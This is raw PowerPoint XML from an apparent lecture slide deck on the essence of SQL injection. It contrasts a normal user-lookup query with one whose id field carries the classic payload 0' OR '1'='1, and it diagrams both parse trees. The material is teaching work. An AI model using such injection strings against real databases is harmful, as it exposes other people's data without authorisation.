              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>The server returns the </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>     user data with id=5017</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>(SQL query: </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SELECT * FROM user WHERE id=‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5017</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604640" y="2143116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olid"/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18" name="群組 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="993190" y="5220314"/>
            <a:ext cx="7079272" cy="923330"/>
            <a:chOff x="1000100" y="2425479"/>
            <a:chExt cx="3505200" cy="1071230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33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1071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2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>The server returns all </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
                <a:t>tuples</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t> in the user table </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SELECT * FROM user WHERE id=‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0’ OR ‘1’=‘1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p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34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21" name="群組 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1000101" y="4631304"/>
            <a:ext cx="7079272" cy="369332"/>
            <a:chOff x="1000100" y="2425479"/>
            <a:chExt cx="3505200" cy="428492"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43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4284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/>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
                <a:t>Send an HTTP request with id =</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1F497D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0’ OR ‘1’=‘1 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW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sp>
          <p:nvSpPr>
            <p:cNvPr id="44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 type="triangle"/>
              <a:tailEnd type="non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30" name="頁尾版面配置區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2BDA0B-9683-094A-8D4D-6E31A694E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4"/>
            <a:ext cx="8229600" cy="839787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Essence of SQL Injection</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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44FA4CD-B149-6A45-9BC9-71B30BD9F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2F3A0DD-EF31-334D-BF4C-307D5AD02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14CC908-7DB3-144A-B794-6DD33A228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8BA1A1F-A3AF-8540-8446-D4771BBA7823}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079372" y="2204864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where_clause</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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3AA973DC-A857-E64D-91C5-E556FE3C95C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="3284984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WHERE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="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D40C916A-B841-604B-B1CF-C8725B8D09E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943468" y="3275692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bool_cond</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0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06475683-F91B-AE4D-840D-0A714B5B4B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2194769" y="4211796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cond</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0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213BBA9F-5DC6-654F-A877-89B33B6A8555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2344230" y="5219908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=</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/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EC0B965A-7408-F146-8E3C-ED394B7D7864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1867298" y="5219908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id</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0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F695BB69-1082-1F4A-B0D5-02C8155375D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2735556" y="5219908"/>
            <a:ext cx="1469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‘0’ OR ‘1’=‘1’</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直線接點 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264EF621-E03F-BA4F-AE47-B6A230C75F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="989482" y="2574196"/>
            <a:ext cx="893957" cy="71078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8" name="直線接點 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B4F68C5-2A16-6146-8F25-F68BEDFF6578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1883439" y="2574196"/>
            <a:ext cx="684559" cy="701496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2" name="直線接點 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A99AC7A-080B-4742-8210-519C145F8599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 bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2537171" y="3645024"/>
            <a:ext cx="30827" cy="566772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5" name="直線接點 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49B2C14-19FE-8C4E-ABA8-F6DAA2783B2C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 bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2049399" y="4581128"/>
            <a:ext cx="487772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524E602B-9DF4-FB45-AEEE-91763FAF60C0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 bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2503889" y="4581128"/>
            <a:ext cx="33282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31" name="直線接點 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C61A39F-3DB9-AE46-814E-663270225076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="2"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2537171" y="4581128"/>
            <a:ext cx="933234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980E6CD2-EAB4-4648-8B7F-8E611BD74DCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183828" y="1196752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where_clause</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/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94748368-48B0-0A46-9733-3E8B096C9118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2276872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WHERE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/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D005D07B-4D1A-EB4B-9F0F-AD0B117CF08D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6047924" y="2267580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bool_cond</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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D1A64287-83C0-9742-8062-71A2E6F56966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372335" y="5219908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OR</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="直線接點 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B631A5-AFE7-5040-811E-924DFA189B6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="47" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5093938" y="1566084"/>
            <a:ext cx="893957" cy="71078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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1426AD9-151E-F543-AD91-03FC44BED725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="47" idx="2"/>
            <a:endCxn id="49" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5987895" y="1566084"/>
            <a:ext cx="684559" cy="701496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6" name="直線接點 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61952C4-A610-434C-A8B8-66DFF35FDD31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="49" idx="2"/>
            <a:endCxn id="53" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6637793" y="2636912"/>
            <a:ext cx="34661" cy="2582996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2F125124-DE37-8748-9CF4-A7BDB4C5B050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5075089" y="3203684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cond</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="文字方塊 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04932DE-A397-264F-9DAA-306D43F8BF0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258250" y="5219908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=</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="文字方塊 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8495D571-86F7-C242-AECB-624719C281B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4781318" y="5219908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id</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="文字方塊 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E93D197-F47B-5243-BA62-B474DE6DC75D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5649576" y="521990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‘0’</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="直線接點 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A20E84-E2AC-DB4D-B7EA-C0ED49089C18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="49" idx="2"/>
            <a:endCxn id="69" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5417491" y="2636912"/>
            <a:ext cx="1254963" cy="566772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9EF905F9-F479-D94D-A9A0-FFE494215D37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="69" idx="2"/>
            <a:endCxn id="71" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4963419" y="3573016"/>
            <a:ext cx="454072" cy="1646892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75" name="直線接點 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64BAD677-708B-E349-98DB-0F8A71FB74ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="69" idx="2"/>
            <a:endCxn id="70" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5417491" y="3573016"/>
            <a:ext cx="418" cy="1646892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76" name="直線接點 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C62B0A0-C904-0447-81D5-FF94D8DCCA0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="69" idx="2"/>
            <a:endCxn id="72" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5417491" y="3573016"/>
            <a:ext cx="439834" cy="1646892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78" name="文字方塊 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FC717C4-300F-094C-A61C-ED06D6A68E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497441" y="4211796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cond</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="文字方塊 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{896388E4-E262-3D45-ACB6-3C3B75497BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7646902" y="5219908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=</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文字方塊 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF45AEC9-432A-D34E-BF8D-5224297849F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7169970" y="521990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‘1’</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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1A36CD8A-36CC-274B-B08F-4C2E934E773D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038228" y="521990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‘1’</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="直線接點 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7F497A4-38DE-3B4B-9CD9-7DD240E8AA59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="49" idx="2"/>
            <a:endCxn id="88" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6672454" y="2636912"/>
            <a:ext cx="965642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83" name="直線接點 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCA5E24-7927-3F46-B596-D22053218AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="78" idx="2"/>
            <a:endCxn id="80" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7377719" y="4581128"/>
            <a:ext cx="462124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84" name="直線接點 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A410066D-B5E9-AA46-9FA9-9F27F03FFF28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="78" idx="2"/>
            <a:endCxn id="79" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7806561" y="4581128"/>
            <a:ext cx="33282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85" name="直線接點 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89171987-DEFE-4545-8CFE-85402AEDF590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="78" idx="2"/>
            <a:endCxn id="81" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7839843" y="4581128"/>
            <a:ext cx="406134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88" name="文字方塊 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED5CAFB3-EDDD-FA40-B534-22A646F24FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013566" y="3275692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bool_cond</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="89" name="直線接點 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B251F0-B860-8740-B83D-9BEBD76CD1C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="78" idx="0"/>
            <a:endCxn id="88" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7638096" y="3645024"/>
            <a:ext cx="201747" cy="566772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93" name="文字方塊 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FBF7DD-EE3C-414C-B809-D0659CC6173B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="5805264"/>
            <a:ext cx="285526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TW" sz="2400" dirty="0"/>
              <a:t>Intended parse tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(simplified)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="文字方塊 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E8F7DCB-1B56-D64E-8ABC-F0BF312BC5C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372142" y="5805264"/>
